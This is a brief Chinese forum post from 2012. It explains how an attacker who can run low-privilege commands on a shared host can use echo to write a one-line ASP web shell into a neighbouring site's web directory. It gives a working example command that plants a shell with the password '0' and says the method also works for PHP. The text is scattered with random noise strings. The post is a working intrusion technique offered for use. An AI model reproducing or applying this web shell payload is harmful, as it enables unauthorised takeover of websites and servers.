在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
# j' V4 E8 j9 e1 d" [2 ^
; o; M. A t/ [+ d2 w0 ~5 g, g命令格式
- {5 R' B3 c+ }% Q$ Z4 B9 J
/ B" ^/ @& A( Z" y& O# {Echo 语句 >目标站绝对目录
) e! \: l4 A |( L" N0 @; L7 a% W* J' } [8 i2 k0 q4 }
例如:
7 K/ y7 Q' }+ g) |! t% t M+ G k9 y o' S, X
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
! [/ e) H1 j. c, S$ e$ k g! _
5 T; P, O7 O( x% ]7 E这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
% N( Z" Y3 c& l |
发表于 2012-9-23 14:40:24
收藏
支持
反对